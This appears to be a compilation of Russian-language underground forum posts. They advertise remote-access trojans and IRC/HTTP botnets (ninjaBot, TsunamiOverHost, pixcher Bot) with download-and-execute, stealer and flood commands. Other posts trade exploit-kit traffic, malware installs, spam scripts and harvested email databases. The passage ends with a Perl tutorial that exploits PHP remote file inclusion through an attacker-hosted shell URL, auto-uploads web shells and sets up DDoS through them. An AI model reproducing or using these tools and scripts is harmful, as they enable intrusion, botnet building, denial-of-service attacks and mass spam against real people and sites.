- Version Column
- Unlimited Connections
- Possibility to run a 0.1's Server and a 0.2's Server------------------------------------------------------------------------------------------------
Builder :
- IP
- PORT
- Install Options
- Install in System/Win/User Directory
- Run Registry
- Fake MessageBox Options
- Number
- Type
- Title
- Text
- 239 KO (AutoIt !)R.A.T Options :
- Control
- Download & Execute
- Download & Execute ALL
- Mouse Control
- Open a Site
- File Create
- CMD
- File Manager
- Process Manager
- Windows Manager
- Register Manager- Stealer
- No-IP
- Windows
- FileZilla Chat- Full Informations Computer
- Fun
- Chat
- Message
- Shutdown (8 Possibilies)
- CDTray ON/OFF- Server Settings
- Restart
- Close
- UninstallBotNet Options :
- HTTP Flood Start (One Victim)
- HTTP Flood Stop
- HTTP Flood Start ALL (All Victims)
- HTTP Flood Stop ALLClick to expand...
Spoiler: 40
Passwd:~+xss.is/+~
Download
DDOS'ер не тестил, бот стучит, управление объёмное... глючат пару функций, но
в целом забавный приборчик, можно поиграться.
File Info
RESULTS: 0/31
AVG Free OK
ArcaVir OK
Avast OK
Avast 5 OK
AntiVir (Avira) OK
BitDefender OK
VirusBuster Internet Security OK
Clam Antivirus OK
COMODO Internet Security OK
Dr.Web OK
eTrust-Vet OK
F-PROT Antivirus OK
F-Secure Internet Security OK
G Data OK
IKARUS Security OK
Kaspersky Antivirus OK
McAfee OK
MS Security Essentials OK
ESET NOD32 OK
Norman OK
Norton Antivirus OK
Panda Security OK
A-Squared OK
Quick Heal Antivirus OK
Rising Antivirus OK
Solo Antivirus OK
Sophos OK
Trend Micro Internet Security OK
VBA32 Antivirus OK
Vexira Antivirus OK
Webroot Internet Security OKClick to expand...
Del
Здравствуйте ув. форумчане.
У меня такая трабла, была утеряна связка по причине сгоревшего винта, потом долго Я ее не юзал и в итоге вновь решил попробывать, что да как, стукнул ТС, он мне востоновил связку, но забыл выслать доку по настройке, ну Я как смог так настроил, решил проверить пробив, витоге пробив абсолютный НОЛЬ... думаю, что то не так настроил, может где права не те выставил... прошу ТС и его саппорта в аське дать мне доку к связке, никто не отвечает, попробовал через их сайт, тоже никто не ответил... поэтому прошу, у кого есть дока отпишите в асю 379755805 или скиньте линк, где можно слить, могу заплатить...
Здравствуйте УВАЖАЕМЫЕ ФОРУМЧАНЕ !!!
Цель моего поста: найти партнера который желают зарабатывать деньги в сфере
загрузок.
Что требуется от партнера: трафик, любой тематики и страны.
Что имею Я: Связка эксплоитов [YES Exploit System] от ~r00t(автор связки),
подробное описание можно посмотреть тут _forum.xakep.ru/m_1416880/tm.htm
Хостинг, где висит связка, привязанный домен.
Общий кошелек WebMoney с которого будем распределять доходы.
Предоставлю полный доступ к статистике.
Деньги пополам.
контакты: 422-695
Постоянно скупаю загрузки.
Рейты довольно высокие.
Много подробностей в ICQ 420056002
Основные проблемы с которыми я сталкивался на этом фронте.
При покупке, проверенные селлеры сгружают одни и теже загрузки в несколько
рук, что вызывает бОльшую паливность бинаря у всех кому они их згружают, и
ведет только к проиграшу тех кто покупает.
Основная же беда партнерок в том что на самом деле они дают обалденные рейты,
а когда начинаешь работать вылазит шейв. Они показывают некоторый процент
загрузок, ну и соответственно если рейт 25 центов, например за US, а
показывают они только половину, то реальный рейт не всех устроит..
Я предлагаю много решений, думаю найду что-то под каждого продавца.
Могу работать и по предоплате за инсталл, и по модели деления прибыли.
Гарантирую регулярно чистый бинарь. Есть даже возможность подгружать ваши
модули, при условии что они не будут конфликтовать. Почему я не озвучу рейты
сразу в обьявлении, да потому что они зависят от каждого. Но скажу что
стартовая цена за US от 120$ за тысячу.
Вообщем я ХОЧУ РАБОТАТЬ. Не кидать кого-то, не искать легких путей, а именно трудиться, и делиться прибылью с ПАРТНЕРАМИ, а не халявщиками, которые мечают утянуть 100 WMZ.
Если вы хотите договременного и успешного сотрудничества стучитесь.
Добавлено в [time]1252930570[/time]
Промахнулся разделом. Искренне извиняюсь. Модераторы, пожалуйста перенесите
тему.
Господа, такая трабла, как только разработчики этого зверя переписали админку на UTF-8 я не смог её поставить, знания мои в php скудноваты, так что прошу вас мне помочи. Сама ошибка
Code:Copy to clipboard
Fatal error: Call to undefined function mb_internal_encoding() in T:\home\localhost\rob\system\global.php on line 1
Строка где присутствует ошибка:
Code:Copy to clipboard
<?php error_reporting(E_ALL); set_time_limit(0); mb_internal_encoding('UTF-8'); mb_regex_encoding('UTF-8');
Помогите разобраться....
Требуются базы @AOL Mail в неограниченных количествах.
Писать предложения сюда или в аську пять-66-три-6-2
Есть ли софт который вытягивает с сайта номера телефонов?
Буду очень признателен!!!
Обозначенная область для меня новая, поэтому пытаюсь вникнуть в тему...
Есть загрузки, которые осуществляются с помощью связок эксплоитов.
А где достать трафик?
Если реализовывать все от обеспечения трафика до загрузки, неподъемная
система, наверное, получается.
Поэтому есть предположение, что помимо продаж загрузок, есть продажа трафика
под связки.
Это так? Или обычно, кто связку реализовывает, тот её и "танцует"?
Если трафик (именно для сплойтов) продается, то как это выглядит? Где находят таких продавцов, сколько это стоит (какая система взаиморасчетов)?
ССорри, та глупые вопросы.
Здравствуйте товарисчи Спамеры! Нужны Ваши услуги, а в частности
рассылка по mail.ru
isq: 339370
Каким то чудом заблокировал 25 порт и теперь к нему нет доступа :bang: , ни BAT почтовый, ни проги по рассылке не могут подключиться, короче почту отправить не могу, может кто подскажет что нужно сделать, что бы ситуацию поправить?
Подарите пожалуйста деда в личку, любого... :fie: буду ооочень признателен! Не сочтите за попрошайничество, просто купить нет возможности .
Mail Grabber [bot] v0.3
Описание
Mail Grabber [bot] v0.3 - это приватный скрипт-собиратель СПАМ-листов с
сайтов, со множеством полезных функций. Может собирать мейлы с одного
определённого сайта, может собирать мейлы одного определённого домена.
Скрипт видит различные вариации записи мейла, вот некоторые из них:
mail@mail.ru
mail[at]mail.ru
mail[at]mail[dot]ru
mail[dog]mail[dot]ru
mail(@)mail.ru
mail(a)mail.ru
mail Собака mail Точка ru (таким образом мейл записывается в комментариях
движка Spaiz-Nuke)
Установка
Залейте все файлы бота на фтп хостинга и поставьте на них chmod 777!
Использование
В поле "Сайт, с которого собирать" напишите сайт, с которого Вы бы хотели
начать сбор мейлов...
В поле "Максимальный размер файла с мейлами" по умолчанию стоит 5 мб, Вы
можете поставить своё...
В поле "Мейл-домен который собирать" напишите домен, мейлы с которым
сохранятьв emails.txt
(остальные сохраняться не будут) или оставьте пустым, чтобы не использовать
данную опцию...
Опция "Собирать только с одного сайта" позволяет не выходить за пределы сайта,
который Вы назначили в первом поле...
Способ
В поле "Сайт, с которого собирать" вбейте "otvet.mail.ru", включите опцию
"Собирать только с одного сайта". Дело в том, что на сайте otvet.mail.ru, мэйл
адреса задавших вопрос, либо ответивших на вопрос, записаны в таком виде, в
котором их видит данный скрипт.
ВНИМАНИЕ!
Скачать|Download
Если у Вас не работает скрипт, то скорее всего это из-за хостинга (на нём
отключены некоторые опции необходимые для работы). Меняйте хостиг или юзайте
на ломанных тачках)
©oder by Гвоздь
Скачать Mail Grabber [bot] v0.3
Непонимаю что надо писать в smpt server name.Прога Advanced MassSender?
вопрос про блек енерджы ! когда боту даешь команду "die" бот удаляется или накрывает винду ?
дел, мну стыдно :baby: да и тему тоже дел можно
SpamVirtuoz v4.9
1. Установка:
Скрипт рекомендуется устанавливать на сервере, так как при постинге
сообщений потр**ляется довольно много трафика. При установке на сервере
не забудьте выставить права на запись папке "bases".
2. Требования:
Любой веб-сервер (например, Apache 1.xx - 2.xx) + PHP (версии 4.xx и выше).
3. Эксплуатация:
Запустите index.php (из корневой директории скрипта). Далее можете выбрать
одно
из трех действий: спам форумов, сбор баз для спама или обзор уже имеющихся
баз форумов.
4. Примечания:
- если вам надо только увеличить ТИЦ вашего сайта или дорвея, рекомендуется
вариант спама гостевых БЕЗ постинга сообщений, но с регистрацией пользователя.
При регистрации пользователя ссылка на ваш сайт будет размещена в разделах
"Профиль пользователя" и "Список пользователей", а работа скрипта будет
гораздо быстрее, чем при варианте <<регистрация + постинг сообщения>>.
- в версии 1.2 появилась возможность указать максимальное время ожидания
ответа хоста, на котором находится форум. Советуется выставить это значение
равным 5 секундам.
- при спаме форумов не забывайте использовать УНИКАЛЬНЫЕ имена и е-мэйлы для
новых пользователей.
- при сборе новых баз рекомендуется сканировать 1-50 страниц для Google,
1-100
страниц для Yahoo и 1-40 страниц для Яндекса.
-------------------------------------------------------------------------------
ВНИМАНИЕ!!! Автор не несет никакой ответственности за ваши действия, связанные
с эксплуатацией этого скрипта!
Партнерская программа Profit-Cash.Biz сочетает в себе все лучшее от PPC и направлена на работу с любым траффиком. Устанавливаемый модуль осуществляет подмену поисковых запросов в браузере IE для Google, MSN, Yahoo и Yandex. Модуль не содержит недокументированных возможностей, как это бывает зачастую в других партнерках. Мы не устанавливаем соксы, не грузим фейковый софт и не крадем пароли с компьютеров. Наш модуль осуществляет только подмену и ничего более. Это дает гарантию его долговременной незаметной работы в системе, что позволит приносить Вам прибыль с Ваших загрузок на протяжение многих месяцев. В отличии от других партнерок подмен выдачи, мы платим не только за клики, но и за Ваши инсталлы. Это позволит в разы увеличить Вашу прибыль и зарабатывать больше даже с теми рейтами, которые на сегодняшний день мы можем Вам предложить.
Мне вот интересно существует данный сабж в природе?
Если да то где достать можно или купить.
E-mail базы:
100 000 e-mails
http://rapidshare.com/files/116998190/100000_emails_base.rar
e-mais base 46 Mb
http://rapidshare.com/files/117007707/emais_base_46mb.rar
6 000 000 e-mails (при распаковке 125.5 Mb!)
http://rapidshare.com/files/117005384/6000...emails_base.rar
mail.ru - 468722 шт.
http://rapidshare.com/files/116961234/mail.ru_-_468722.rar
rambler.ru - 46567 шт.
http://rapidshare.com/files/116963966/rambler.ru_-_46567.rar
yandex.ru - 19773 шт.
http://rapidshare.com/files/116964435/yandex.ru-19773.rar
com.net.org. - 12000 шт.
http://rapidshare.com/files/116961699/com....rg._-_12000.rar
emails nosort - 754748 шт.
http://rapidshare.com/files/116963436/emai...ll_-_754748.rar
База людей, делавших когда либо покупки в интернете
http://rapidshare.com/files/116996687/base_webmony.rar
Email Россия 4894345 шт.
http://rapidshare.com/files/118433487/emai...sia-4894345.rar
Email Москва 198639 шт.
[http://rapidshare.com/files/118265149/emai...skow-198639.rar](http://rapidshare.com/files/118265149/email-
moskow-198639.rar)
Email разное 214891 шт.
http://rapidshare.com/files/118451195/email_base-214891.rar
USA mails 64000 шт.
650000 mail.ru 01.2008
hotmail.com
50000 mail.ru 02.02.2008
2007 Rus 110167
Поиск работы
All spam lists
http://rapidshare.com/files/118927606/emails.rar
Пароль ко всем архивам: mff
Помогите нужен бот или чтот на подобии, если можно скажем чтоб с одного форума из указанной темы запостил всё на другой форум... Ну одним словом нужно наполнить форум нормальными сообщениями как это сделать???
Мне нужен бот автоматической регистрации на одном сайте... Чтоб он постоянно
регился... На сайте капатчи нет или любой другой защиты...
:zns2: Link
вот на этом сайте нужно регится..
Помогите плиз кто чем может
listens on a port to catch ip's so dont be alarmed with firewall
warnings..scan if u can. use with care u might get banned ain't my fault.
-peace[/quote]
Source Code
Code:Copy to clipboard
ninjaBot 2.04 by p0ke
What is so special with ninjaBot ?
1. It patches tcpip.sys at winxp machines to be able to handle 8000 connections.
2. It has persistance
3. It add itself to win xp firewall.
4. If it finds itself behind a firewall, it will use a other bots ftp (by communicating with it) to spread.
5. If a bot with greater version joins channel, it will ask for update.
6. It has a built in honeypot that catches spreading malware. At the moment supporting for only Beagle, mydoom and VNC.
7. It will look so the ftp it has works before using it to spread (every time it finds a vurln computer). It does not work it requests a new working one.
Note:
This bots uses some outdated but might-still-work exploits such as:
NetAPI, UPNP (2 kinds), Netbios (2 kinds), LSASS2 and VNC
This bot has protection againt excess flood so it cannot be flooded out.
These commands can be written at end of mostly
commands. Some example are below.
Commands:
+priv or +p - Makes the result/output be private
+silent or +s - Makes the bot not return any info
+portscan - Can ONLY be used by .scan command.
Makes bot only PORTSCAN and no exploit.
+show - Can ONLY be used by .scan command.
This turns "showtries" command ON.
+update - Can ONLY be used by .download command.
This forces a update on bot.
Examples:
[p0ke] .version +p
-- Looking in private message --
[bot] Using ninjaBot (v2.04)
[p0ke] .killproc notepad.exe +s
-- Silence --
[p0ke] .scan x.x.x.x 80 10 +portscan +show
[bot1] [portscan] found 70.52.6.84:80...
[bot2] [portscan] found 70.23.181.2:80...
You can call on a bot with its nickename, or a range
of bots by its version number, such as this:
[p0ke] bot1 .version
[bot]1 Using ninjaBot (v2.04)
[p0ke] 2.04 .version
[bot1] Using ninjaBot (v2.04)
[bot2] Using ninjaBot (v2.04)
You can use these shortcuts for its nickname:
%lan% - Returns "Lan" or "Dial-up"
%rand% - Returns up to 5 random digits
%co% - Returns Country in 3 chars
Here are bot commands:
(remember to use prefix before command)
login [password]
logout
info
threadinfo - Shows some information of current threads
threadall - Shows all important threads
stopthread [name] - Stops a thread by name. Name can be "all", handle or name.
crypt [text] - Crypts a text using untCrypt.pas
newnick (nickname) - Sets a new bot nickname. If no specified it will make one itself up.
silent [1 or 0] - Switch silent on or off version
action [chan] [text] - Bot makes a action to channel/user
raw [raw text] - Bot sends raw text to server disconnect
cycle [chan] (pass) - Cycles choosen channel w/ pass
prefix (newprefix) - Sets prefix if specified, shows current else.
delete [file] - Deletes specified file if existing.
execute [1 or 0] [file] (params) - Executes visible/hidden file with params
part [channel]
join [channel] (key)
killproc [pid or name] - Kills a process by ProcessID or ProcessName
listproc - Lists all running process (recommended to use +p on this on)
netinfo - Shows connection, ip and host
open [url] - Opens url in default browser
privmsg [chan or user] [text] - Privmessages
reconnect - Reconnects to irc
restart - Restarts bot
quit -
die |- Quits the bot
exit -
remove - Uninstalls from system
uninstall - Uninstalls from system
checkport [ip] [port] [delay] - Checks if a port is open at specified ip address:port
scan [ip-wildcard] [port] [delay] [threads] - Starts a scan. You can use "x" in ip for 0-255 and "*" for 0-9 in wildcard. And you can use "all" in ports to go for all ports, or speceify by splitting with a "," but DONT use spaces.
scaninfo - Shows some scanner info
showtries (1 or 0) - Turn report on or off, if no specified it tells current.
download [url] [save as] (0 or 1) - Downloads a file from URL to Save As. If its 1 then execute, else no execute. Recommended to use +update to update your bot.
http://rapidshare.com/files/98988971/ninja...y_p0ke.rar.html
Here is the link:
Code:Copy to clipboard
http://rapidshare.com/files/56869383/TsunamiOverHost.rar
http://www.megaupload.com/?d=XL9AZWW6
http://www.mooload.com/new/file.php?file=f...ost.rar&s=t
http://www.speedyshare.com/632895313.html
http://www.sendspace.com/file/sdpzui
http://www.files.to/get/53443/hps9wov8zu
http://depositfiles.com/files/1851664
password: tsunami
With this tool you can create own botnet and attack in 3 types of attacks:
This paper and the software has been made for educational purposes only, the
author will not take any responsibilities of you
using TsunamiOverHost application.
First of all if you want to be successful on using this bot read this how-to carefully.
// Things that you need //
The Program ( TsunamiOverHost.exe, 4 files in one folder which will be : index.php, online.php, update.php, and update.txt )
A Host ( you will only need ~10KB )
MySQL ( a database in which you'll create a special "botnet" table )
// Uploading //
Ok, now you know what you need, and what you should have, lets get to the real business ; - )
1. Create a folder.
2. Copy index.php, online.php, update.php, update.txt.
3. Paste it to the folder that you made.
4. Open index.php with some text editor, and where it says :
"SETTINGS FOR ADMIN ACCESS", you gonna put your login and the pass, ex.
$login = "yourLogin";
$password = "yourPassword";
Save.
1. Go to your mysql database.
2. Create a new database.
3. Create a new table, for example open the sql manager and paste this :
CREATE TABLE botnet (
date int NOT NULL,
ip varchar(40) NOT NULL,
b_id int unsigned primary key NOT NULL auto_increment
);
4. Save it.
5. Open your online.php file, and look for :
"Set MySQL database variables" - You will find four variables that you need to fill out.
$online_db_host = "yourHost ( ex . mysql.domain.com )";
$online_db_name = "yourDatabaseName ( ex . haxior )";
$online_db_user = "yourUser ( user for the database ) ";
$online_db_pass = "yourPass ( password to the database )";
Save.
Now in your folder you should have two updated and two old files.
1. Connect to your ftp ( ex . using flashfxp )
2. Copy the folder that you have made to your host.
3. Change the CHMOD's of file update.txt to 777.
4. Disconnect.
After setting everything up, you will open TsunamiOverHost.exe, and give the
path to the folder that you just updated to
your ftp. ( ex . domain.com/panel )
This paper and the software has been made for educational purposes only, the
author will not take any responsibilities of you
using TsunamiOverHost application.
First of all if you want to be successful on using this bot read this how-to carefully.
// Things that you need //
The Program ( TsunamiOverHost.exe, 4 files in one folder which will be : index.php, online.php, update.php, and update.txt )
A Host ( you will only need ~10KB )
MySQL ( a database in which you'll create a special "botnet" table )
// Uploading //
Ok, now you know what you need, and what you should have, lets get to the real business ; - )
1. Create a folder.
2. Copy index.php, online.php, update.php, update.txt.
3. Paste it to the folder that you made.
4. Open index.php with some text editor, and where it says :
"SETTINGS FOR ADMIN ACCESS", you gonna put your login and the pass, ex.
$login = "yourLogin";
$password = "yourPassword";
Save.
1. Go to your mysql database.
2. Create a new database.
3. Create a new table, for example open the sql manager and paste this :
CREATE TABLE botnet (
date int NOT NULL,
ip varchar(40) NOT NULL,
b_id int unsigned primary key NOT NULL auto_increment
);
4. Save it.
5. Open your online.php file, and look for :
"Set MySQL database variables" - You will find four variables that you need to fill out.
$online_db_host = "yourHost ( ex . mysql.domain.com )";
$online_db_name = "yourDatabaseName ( ex . haxior )";
$online_db_user = "yourUser ( user for the database ) ";
$online_db_pass = "yourPass ( password to the database )";
Save.
Now in your folder you should have two updated and two old files.
1. Connect to your ftp ( ex . using flashfxp )
2. Copy the folder that you have made to your host.
3. Change the CHMOD's of file update.txt to 777.
4. Disconnect.
After setting everything up, you will open TsunamiOverHost.exe, and give the
path to the folder that you just updated to
your ftp. ( ex . domain.com/panel )
If everything goes fine, you will find a new file called server.exe. This file
will be responsible for the power of the bot,
More people open it = the bot will be more powerfull. In the panel, you will
be able to see how many server.exe files are
running on other peoples computers!
Yes! Lets have some fun ; >
1. Go to your panel ( the one you uploaded through ftp, ex. domain.com/panel.
)
2. Login.
I don't think i have to explain anything now, but remember the author will not take any responsibilities of the results!
-UDP
-ICMP
-HTTP
На работоспособность не проверялось!!!На свой страх и риск.
Выложите исходники SD бота!Не кривые!Все что нашел все кривое.
приветствую всех! нужен умелец который мог бы слить базу майлов с заруюежных датинг сайтов или возможно у кого то уже есть такое добрло! куплю дорого но сначала тест на 5K мыльников и если это именно то и валид то беру всю базу , естественно через гарант . жду в PM
Собсно сабж.. 70-80% валиды поэтому недорого
объем 380 тыс
UPD отдам за 20
Ищется АМС 2.6 +кряк !!! вроде такой есть в природе, плиз подскажите
Набрал я довольно обширный лист мейлов, а чем их можно нормально отпарсить? Выдрать те домены, которые мне нужны?
Помогите пожалуйста! Мне в Skype надо одному челу насолить. Какие проги мне могут помочь?
Вопрос такой:
Вот например на mail.ru сидят дядечки, которые занимаются вычислением спама (с
какого сервака идут) и катают абузы: мол с вашего сервака нас валят.
Как они определяют ээтот спам? Если я буду бессмысленно спамить с
генерированный баз типа:
blablabla1@mail.ru
blablabla2@mail.ru
итд. Если эти мыла не существуют, я дождусь абузы с сервака? Скока надо разослать писем чтобы того добиться?
Ребята тут все пишут куплю куплю... кто может расказать что за загрузки и с-чем едят? :unsure: :baby:
pixcher Bot ver 1.1 beta
Установка:
1)Поставь бит на запись на файл command.txt и папки files и bot
2)в файле "config.php" пропишите пароль на доступ и данные своего сервера SQL
3)запустить в браузере файл install.php
4)в админке нажми на ссылку "К настройке бота", введи url до админ панели
(скрипт автоматически вставляет путь до текущей админки, сверь его) и нажми на
кнопку "скомпилировать бот". Под виндой бот автоматически сжимается upx'ом.
Либо воспользуйтесь exe билдером из папки bot
5)скачивай файл done.exe и пользуйся им по своему усмотрению =)
краткое описание возможностей бота:
- обход всех фаеров
- работа от имени svchost.exe, lsass.exe или любого другого процесса
- загрузка файлов на компьютер по http:// и ftp://
- запуск exe файлов
- возможность обновления бота более новой версией
- бот получает новые команды только один раз, то есть если боту передать
команду на скачивание (get http://test.ru/file.exe) то он скачает этот
файл только один раз (а не при кадждом заходе бота) и будет ждать новых команд
- добавленна работа бота под ограниченными правами user или гостя
Описание работы с ботом
В комплекте с ботом поставляется админка, написаня на php+mysql
(настройка админки в файле ReadMe.txt).
Имеется также возможность загрузки файлов на сервер
Команды для бота:
get
скачать файл по http:// или по ftp://
пример :get http://test.ru/file.dll
getexe
то же что и get, но после скачивания файл запускается
пример :get http://test.ru/file.exe
message
обычный мессадж бокс
пример :message хеллоу ворлд
die
удаление бота из системы и выгрузка его из памяти
exec
запуск exe файла, выполнение системных команд
пример :exec test.exe
пример 2 :exec cmd /C del /Q "c:/file_to_del.txt"
Например файл с коммандами может выглядить так:
###############################################
getexe http://test.ru/file.exe
exec notepad.exe
message скачан и запущен файл file.exe + notepad
###############################################
В статистике видны ip адреса и уникальные ключи (принадлежность к железу) всех ботов заходших за командами.
Админка также защищается паролем .
Для изменения пароля необходимо изменить config.php.
Нужна програма для масовыи расылкь, те што в тему ниже не работаиут деад линк.
пасиба.
сорри за транслит
Родилась такая мысль.
Сабжевый форум позволяет отправлять е-маил на ящик пользователя прямо через
форум.
А незнает ли кто, существует ли софт, позволяющий 100% отправлять спам на
реальные мыла пользователей через форумные скрипты? Я умом-то понимаю, что
трафика на это уйдет возможно больше, но с другой стороны спам дойдет
практически со 100% вероятностью до адресата. И в случаях различного рода
нтиспамерских скриптов - пострадает только чей-то форумный мальник/ip.
Что скажете по этому поводу?
| by n4n0bit | bitdotcom@gmail.com | http://n4n0bit.nm.ru/ | http://hellknights.void.ru/ |
------------------------------
Боты поисковых машин 2
------------------------------
[0] предисловие
[1] поисковая часть
[2] фильтрация результатов
[3] exploiting
[4] автошеллер
[5] организация ddos на базе web-шеллов
[6] средства закачки файлов в unix-like
[7] ссылки
[8] Gr337z
------------------------------
[0] Эта статья является продолжением, ориентирована на perl/php кодера. Она
может дать толчок в написании DDOS средств и не толька.
Так же этот материал можно использовать в качестве уведомления владельцев
своих web-проектов о найденных уязвимостях в ПО, за что в
последующем можно получить вознагрождение.
[1] Для поиска будем использовать 4ре поисковые системы: aol.com, msn.com, yandex.ru, google.com
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
our $h0pz = 20; # число скачков по результатам поисковика
our $banner = 'kblance'; # собственно цель поиска
our $mask = 'BB/'; # маска установочного пути, т.е.
http://bla.ru/phpBB/index.php, если ПО установлено сразу в корень,
.
our $include = 'http://[my_shell]/script'; # это путь к скрипту который мы
хотим подгрузить, используя уязвимость
our $accord = 'vse_zaebis'; # возвращаемый ответ соответствия
our @c0ntent = (); # в эту переменную будут в последующем заноситься
результаты поиска
our @uRLS = (); # здесь уже будут содержаться исключительно только URL
sub aolCom
{
print "[:: aol.com ::]\n";
for(my $i = 1; $i <= $h0pz/10; $i++) # скачим по страницам результатов
{
my $ua = LWP::UserAgent->new;
$ua->agent("Googlebot/2.1 (+http://www.google.com/bot.html)" . $ua->agent);
my $req = HTTP::Request->new(GET =>
"http://search.aol.com/aolcom/search?invocationType=topsearchbox.search&query=$banner&page=$i");
$req->header('Accept' => 'text/html');
my $res = $ua->request($req);
push @c0ntent, $res->content;
}
foreach(@c0ntent){push @uRLS, $_ =~ m{<b id="[^"]*">(.+?)}smig;} #"
}
sub msnCom
{
print "[:: msn.com ::]\n";
for(my $i = 1; $i <= $h0pz; $i += 10) # скачим по страницам результатов
{
my $ua = LWP::UserAgent->new;
$ua->agent("Googlebot/2.1 (+http://www.google.com/bot.html)" . $ua->agent);
my $req = HTTP::Request->new(GET =>
"http://search.msn.com/results.aspx?q=$banner&first=$i&FORM=");
$req->header('Accept' => 'text/html');
my $res = $ua->request($req);
push @c0ntent, $res->content;
}
foreach(@c0ntent){push @uRLS, $_ =~ /
sub yandex
{
print "[:: yandex.ru ::]\n";
for(my $i = 1; $i <= $h0pz/10; $i++) # скачим по страницам результатов
{
my $ua = LWP::UserAgent->new;
$ua->agent("Googlebot/2.1 (+http://www.google.com/bot.html)" . $ua->agent);
my $req = HTTP::Request->new(GET =>
"http://ya.ru/yandpage?&q=744300646&p=$i&ag=d&qs=rpt%3Drad%26text%3D$banner");
$req->header('Accept' => 'text/html');
my $res = $ua->request($req);
push @c0ntent, $res->content;
}
foreach(@c0ntent){push @uRLS, $_ =~ /\W{3}.href\W{2}(.+?)\W.target/g;} #"
}
sub google
{
print "[:: google.com ::]\n";
for(my $i = 1; $i <= $h0pz; $i += 10) # скачим по страницам результатов
{
my $ua = LWP::UserAgent->new;
$ua->agent("Googlebot/2.1 (+http://www.google.com/bot.html)" . $ua->agent);
my $req = HTTP::Request->new(GET =>
"http://google.com/search?q=$banner&hl=en&lr=&start=$i&sa=N");
$req->header('Accept' => 'text/html');
my $res = $ua->request($req);
push @c0ntent, $res->content;
}
foreach(@c0ntent){push @uRLS, $_ =~ /<a.\w+\W{2}.\W.\w+\W{2}(.+?)\W>/g;} #"
}
Итак поисковая часть собственно готова.
Как вы видите все довольно просто, что только требуется, так это менять
шаблоны для парсинга.
Я поясню почему в одном случае делается for(my $i = 1; $i <= $h0pz; $i += 10)
, а в другом
for(my $i = 1; $i <= $h0pz/10; $i++);
Просто когда поисковик выдал первый результат на 1й странице, вы можете
просмотреть результаты и на последующих страницах, на сколько это возможно, и
щелкать 1,2,3...10
так вот, в Google, например, в переменную "start" ( =en&lr=&start=$i& )
добавляется 10 всегда если вы на первой, если на 2й то еще 10 и того 20; у
других же поисковиков, например yandex.ru передается в переменную "p" (
744300646&p=$i&ag=d&qs )
по порядку цифры, от 1 и дальше в зависимости от того, сколько страниц
результата поиска. Ну а уже наша переменна (не поисковика) $i и есть число
следующей страницы результатов. Тут, предполагаю, вам все понятно.
[2] Здесь опишем "фильтр", т.к. из этих 4х поисковиков в переменной массива @uRLS могут содержаться одинаковые результаты, т.е. одинаковые URLы, поэтому нам требуется выбросить из массива одинаковые результаты. Чтобы воспользоваться функцией filter(), необходимо передать ей URLы, это уже я не буду здесь описывать, это касается и последующих функций.
sub filter # filter("список урлов");
{
print "[:: filtering ::]\n";
my (%uR,%glob);
foreach(@) #
{
/(.+?$mask)/oi; # определяем URL до маски установочного пути и заносим в
специальную переменную $1
my $url = $1;
$uR{$} = $url if /$mask/oi; # добавим URL если он содержит маску
установочного пути
next if exists $uR{$_}; # если такой URL уже содержится в качестве ключа хеша
%uR, то исключим его
}
foreach(keys %uR)
{
/.+?//.+?(/.*$mask)/oi; # здесь определяем установочный путь уязвимого ПО и
заносим его в специальную переменную $1
my $dir = $1;
my @own = split(///,$_);
unless($own[2] =~ /^www/) { $own[2] = "www.".$own[2]; } # здесь добавим "www"
если они отсутствуют
$glob{$own[2]} = $dir; # здесь ключем является URL, а значением ключа
установочный путь
}
return %glob; # возвращаем результат host/repl
}
[3] Итак подпрограмма фильтрации у нас готова, поисковая часть тоже есть,
сейчас напишем подпрограмму которая будет проверять
работоспособность уязвимости.
sub fucking # fucking("%glob");
{
print "[:: exploiting ::]\n";
foreach my $href(%glob)
{
while(my($a,$b) = each %$href) # пройдясь по хешу, запишем в переменную $a
хост, а в $b - установочный путь
{
my $ua = LWP::UserAgent->new;
$ua->agent("Googlebot/2.1 (+http://www.google.com/bot.html)" . $ua->agent);
my $req = HTTP::Request->new(GET => "http://$a$b$include"); # здесь уже
добавляем переменную $include
$req->header('Accept' => 'text/html');
my $res = $ua->request($req);
if($res->content =~ /$accord/oi) # проверяем ответ сервера на наличие слова-
соответствия
{
print "[ + ] $a$b$include\n"; # выводим результат если все удалось
}
else
{
print "[ - ] $a$b$include\n"; # если не удалось
}
}
}
}
Ну собственно все, вам только остается все это дело склеить, добавить еще 5 строк кода.
[4] Далее поведаю вам как можно написать простой автошеллер. Автошеллер - это
автоматизированный скрипт, который используя уязвимость
закачивает шеллСкрипт (или что-либо другое ).
Итак, принцип работы автошеллера заключается в использовании уязвимости, но
тут я немного поясню.
Мы имеем 100% php-include поэтому URLу
http://victim.org/admin.php?i=[здесь_уязвимость],
в значении переменной "i" мы подставляем следующий URL:
http://[SHELL]/p.php&url=http://[SOURCE]/post.txt&kuda=./&name=iamhax0r.php
Все в целом будет выглядеть так:
http://[victim.org]/admin.php?i=http://[SHELL]/p.php&url=http://[SOURCE]/post.txt&kuda=./&name=iamhax0r.php
^^^^^^^^^^^^^^^^^^^^^^^^ ^^ ^^^^^^^^^^^^
В значение переменной "url" ставим URL того, что требуется скачать.
В значение переменной "kuda" заносим значение куда нужна сохранить, а нашем
случае в текущую диру "./"
Значение переменной "name" - здесь пишем под каким именем нужно сохранить.
Итак, используя этот вариант и учитывая что бага нам позволит им
воспользоваться мы можем закачивать любой файл на сервер не пользуясь при этом
wget, fetch, curl и прочие программы для закачки.
После того как вы закачаете, если файл будет удачно сохранен, то будет
отправлен ответ ввиде сообщения
"You_the_mainest_evil_of_runet by Hell Knights Crew", который послужит в
дальнейшем сигнализатором выполнения успешной работы.
Вот содержимое p.php:
Пишем сам код автошеллера:
#!/usr/bin/perl
use strict;
use LWP::UserAgent;
use warnings;
our $sh_file = 'shells.txt';
our $reply =
'http://shell.narod.ru/p.php&url=http://src.by.ru/post.txt&kuda=./&name=iamhax0r.php';
open(SH,"$sh_file") or die "$!";
foreach(
{
chomp;
my $ua = LWP::UserAgent->new;
$ua->agent("Googlebot/2.1 (+http://www.google.com/bot.html)" . $ua->agent);
my $req = HTTP::Request->new(GET => "$_$reply");
$req->header('Accept' => 'text/html');
my $res = $ua->request($req);
if($res->content =~ /You_the_mainest_evil_of_runet by Hell Knights Crew/) {
print "[ + ] $$reply\n"; }
else { print "[ - ] $$reply\n"; }
}
close SH;
[5] Думаю для названия этой статьи будет актуально привести небольшой пример
организации DDOS атак построенный на шеллСкриптах.
Суть очень проста: скажем вы имеете файл содержащий уже закаченных и рабочих
шеллов. Возьмем за основу r57shell 1.31 мы просто передаем параметры скрипту и
все. =))
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
